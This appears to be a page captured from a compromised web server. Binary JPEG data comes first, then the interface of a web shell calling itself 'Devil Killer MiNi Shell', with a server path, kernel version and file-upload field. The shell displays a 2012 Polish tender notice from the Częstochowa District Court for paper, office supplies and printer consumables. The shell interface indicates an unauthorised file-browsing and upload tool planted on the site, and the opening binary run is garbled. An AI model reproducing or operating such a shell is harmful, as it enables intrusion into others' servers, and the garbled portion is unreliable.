JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/16047-N-2012.html

<p class="kh_header"><b>Częstochowa: Dostawy papieru, artykułów biurowych oraz materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych do Sądu Okręgowego w Częstochowie</b><br>
<b>Numer ogłoszenia: 16047 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Częstochowie , ul. Dąbrowskiego 23/35, 42-200 Częstochowa, woj. śląskie, tel. 34 36 84 430, faks 34 36 84 440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy papieru, artykułów biurowych oraz materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych do Sądu Okręgowego w Częstochowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia

1) Przedmiotem zamówienia są:
1).1 zadanie A - dostawy papieru do drukarek, kserokopiarek i urządzeń wielofunkcyjnych;
1).2 zadanie B - dostawy artykułów biurowych i drobnego sprzętu biurowego;
1).3 zadanie C - dostawy materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych 
do Sądu Okręgowego w Częstochowie.

2)    przedmiot zamówienia zgodnie ze Wspólnym Słownikiem Zamówień - kody CPV:
CPV - 30197630-1 - papier do drukowania
CPV - 30197644-2 - papier kserograficzny
CPV - 30199310-6 - papier wytłaczany lub perforowany do drukowania
CPV - 22992000-0 - papier czerpany lub tektura
CPV - 30197200-8 - skoroszyty
CPV - 30192111-2 - poduszki z tuszem
CPV - 30197200-8 - skoroszyty
CPV - 30192122-2 - pióra wieczne
CPV - 24910000-6 - kleje
CPV - 30192123-9 - długopisy z końcówką z włókna
CPV - 30192124-6 - długopisy z końcówką z filcu
CPV - 30199500-5 - segregatory
CPV - 22816000-3 - bloki papierowe
CPV - 30192130-1 - ołówki
CPV - 30192100-2 - gumki 
CPV - 30199792-8 - kalendarze 
CPV - 30197320-5 - zszywacze
CPV - 30197330-8 - dziurkacze 
CPV - 37822100-7 - kredki
CPV - 30192121-5 - długopisy kulkowe
CPV - 22815000-6 - notatniki 
CPV - 22817000-0 - terminarze i organizery osobiste
CPV - 30197000-6 - drobny sprzęt biurowy
CPV - 30141200-1 - kalkulatory biurkowe
CPV - 22600000-6 - tusz
CPV - 30125110-5 - toner do drukarek laserowych/faksów
CPV - 30192113-6 - wkłady drukujące

3)   Szczegółowy opis przedmiotu zamówienia stanowią:
a) zadanie A - załącznik nr 2.A;
b) zadanie B - załącznik nr 2.B;
c) zadanie C - załącznik nr 2.C.

4)    Wykonawca zobowiązany będzie do:

a) dostarczania papieru - przedmiotu zamówienia zadania A - zgodnego z parametrami opisanymi w opisie przedmiotu zamówienia (załącznik nr 2.A). Zamawiający wymaga, aby przez cały okres trwania umowy, Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, dostarczał papier tego samego rodzaju (producenta).
Na poświadczenie powyższych wymagań Wykonawca winien złożyć oświadczenie pisemne zawarte w załączniku nr 2.A.

b) dostarczania artykułów biurowych i drobnego sprzętu biurowego - przedmiot zamówienia w zadaniu B - od jednego producenta przez cały okres trwania umowy. Na poświadczenie powyższych wymagań Wykonawca winien złożyć oświadczenie pisemne zawarte w załączniku nr 2.B.

c) dostarczania materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych - przedmiot zamówienia w zadaniu C - których parametry nie będą gorsze od parametrów oryginalnych materiałów, zalecanych przez producentów urządzeń, w których materiały te będą stosowane. Dotyczy to w szczególności takich parametrów jak: jakość wydruków i wydajność (maksymalna) oraz pełna kompatybilności z urządzeniami, w których są stosowane, zwłaszcza w zakresie prawidłowego funkcjonowania wskaźników zużycia tonera/kartridża oraz wskaźników ilości wydrukowanych stron. Na poświadczenie powyższych wymagań Wykonawca winien złożyć oświadczenie pisemne zawarte w załączniku nr 2.C.

5)    Zamawiający wymaga, aby dostarczony przedmiot zamówienia odpowiadał wymaganiom i parametrom opisanym w załączniku nr 2.A i/lub 2.B i/lub 2.C do SIWZ.

6)	Zamawiający dopuszcza rozwiązania równoważne opisywanym w specyfikacji istotnych warunków zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Za-mawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.

2.	Wymagany termin wykonania zamówienia

1)	Termin wykonania zamówienia - od dnia podpisania umowy do dnia 31 grudnia 2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.76.44-2, 30.19.93.10-6, 22.99.20.00-0, 30.19.72.00-8, 30.19.21.11-2, 30.19.72.00-8, 30.19.21.22-2, 24.91.00.00-6, 30.19.21.23-9, 30.19.21.24-6, 30.19.95.00-5, 22.81.60.00-3, 30.19.21.30-1, 30.19.21.00-2, 30.19.97.92-8, 30.19.73.20-5, 30.19.73.30-8, 37.82.21.00-7, 30.19.21.21-5, 22.81.50.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej  jedną dostawę, której przedmiotem była, w zależności od zadania, do którego przystępuje Wykonawca: 
- zadanie A - dostawa papieru do drukarek, kserokopiarek i urządzeń wielofunkcyjnych. Wymagane jest, aby zrealizowana wartość w/w dostaw wyniosła min. 25 000,00 zł brutto (słownie: dwadzieścia pięć tysięcy złotych 00/100) - wartość jednej umowy/kontraktu.
- zadanie B - dostawa artykułów biurowych i drobnego sprzętu biurowego.
Wymagane jest, aby zrealizowana wartość w/w dostaw wyniosła min. 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych 00/100) - wartość jednej umowy/kontraktu.
- zadanie C - dostawa materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych.
Wymagane jest, aby zrealizowana wartość w/w dostaw wyniosła min. 35 000,00 zł brutto (słownie: trzydzieści pięć tysięcy złotych 00/100) - wartość jednej umowy/kontraktu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Wypełniony, tj. uszczegółowiony o wymagane dane, ostemplowany i podpisany szczegółowy opis przedmiotu zamówienia - załącznik nr 2.A i/lub 2.B i/lub 2.C, w odniesieniu do zada-nia, do którego przystępuje Wykonawca, tj. zadania A i/lub B i/lub C.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony, ostemplowany i podpisany formularz ofertowy - załącznik nr 1 do SIWZ (oryginał).
2) Upoważnienie lub pełnomocnictwo uprawniające osoby podpisujące ofertę do jej podpisania w imieniu wykonawcy składającego ofertę, o ile nie wynika ono z przepisów prawa lub z do-kumentów załączonych do oferty (odpis z rejestru) - oryginał lub kopia potwierdzona za zgodność z oryginałem;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czestochowa.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy
ul. Dąbrowskiego 23/35
42-200 Częstochowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 08:00, miejsce: Sąd Okręgowy
ul. Dąbrowskiego 23/35
42-200 Częstochowa
(pokój nr 33 - nowy budynek - poziom 0).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy papieru do drukarek, kserokopiarek i urządzeń wielofunkcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia

1) Przedmiotem zamówienia są dostawy papieru do drukarek, kserokopiarek i urządzeń wielofunkcyjnych do Sądu Okręgowego w Częstochowie.

2)    przedmiot zamówienia zgodnie ze Wspólnym Słownikiem Zamówień - kody CPV:
CPV - 30197630-1 - papier do drukowania
CPV - 30197644-2 - papier kserograficzny
CPV - 30199310-6 - papier wytłaczany lub perforowany do drukowania
CPV - 22992000-0 - papier czerpany lub tektura

3)   Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2.A.

4)    Wykonawca zobowiązany będzie do dostarczania papieru - przedmiotu zamówienia zadania A - zgodnego z parametrami opisanymi w opisie przedmiotu zamówienia (załącznik nr 2.A). Zamawiający wymaga, aby przez cały okres trwania umowy, Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, dostarczał papier tego samego rodzaju (producenta).
Na poświadczenie powyższych wymagań Wykonawca winien złożyć oświadczenie pisemne zawarte w załączniku nr 2.A.

5) Zamawiający wymaga, aby dostarczony przedmiot zamówienia odpowiadał wymaganiom i parametrom opisanym w załączniku nr 2.A do SIWZ.
6) Zamawiający dopuszcza rozwiązania równoważne opisywanym w specyfikacji istotnych warunków zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.

2. Wymagany termin wykonania zamówienia

1) Termin wykonania zamówienia - od dnia podpisania umowy do dnia 31 grudnia 2012r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.76.44-2, 30.19.93.10-6, 22.99.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy artykułow biurowych i drobnego sprzętu biurowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia

1) Przedmiotem zamówienia są dostawy artykułów biurowych i drobnego sprzętu biurowego do Sądu Okręgowego w Częstochowie.

2)    przedmiot zamówienia zgodnie ze Wspólnym Słownikiem Zamówień - kody CPV:
CPV - 30197200-8 - skoroszyty
CPV - 30192111-2 - poduszki z tuszem
CPV - 30197200-8 - skoroszyty
CPV - 30192122-2 - pióra wieczne
CPV - 24910000-6 - kleje
CPV - 30192123-9 - długopisy z końcówką z włókna
CPV - 30192124-6 - długopisy z końcówką z filcu
CPV - 30199500-5 - segregatory
CPV - 22816000-3 - bloki papierowe
CPV - 30192130-1 - ołówki
CPV - 30192100-2 - gumki 
CPV - 30199792-8 - kalendarze 
CPV - 30197320-5 - zszywacze
CPV - 30197330-8 - dziurkacze 
CPV - 37822100-7 - kredki
CPV - 30192121-5 - długopisy kulkowe
CPV - 22815000-6 - notatniki 
CPV - 22817000-0 - terminarze i organizery osobiste
CPV - 30197000-6 - drobny sprzęt biurowy
CPV - 30141200-1 - kalkulatory biurkowe

3)   Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2.B. do SIWZ.

4)    Wykonawca zobowiązany będzie do dostarczania artykułów biurowych i drobnego sprzętu biurowego - przedmiot zamówienia w zadaniu B - od jednego producenta przez cały okres trwania umowy. Na poświadczenie powyższych wymagań Wykonawca winien złożyć oświadczenie pisemne zawarte w załączniku nr 2.B.

5) Zamawiający wymaga, aby dostarczony przedmiot zamówienia odpowiadał wymaganiom i parametrom opisanym w załączniku nr 2.B do SIWZ.
6) Zamawiający dopuszcza rozwiązania równoważne opisywanym w specyfikacji istotnych warunków zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Za-mawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.

2. Wymagany termin wykonania zamówienia

1)	Termin wykonania zamówienia - od dnia podpisania umowy do dnia 31 grudnia 2012r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.72.00-8, 30.19.21.11-2, 30.19.21.22-2, 24.91.00.00-6, 30.19.21.23-9, 30.19.21.24-6, 30.19.95.00-5, 22.81.60.00-3, 30.19.21.30-1, 30.19.21.00-2, 30.19.97.92-8, 30.19.73.20-5, 30.19.73.30-8, 37.82.21.00-7, 30.19.21.21-5, 22.81.50.00-6, 22.81.70.00-0, 30.19.70.00-6, 30.14.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia

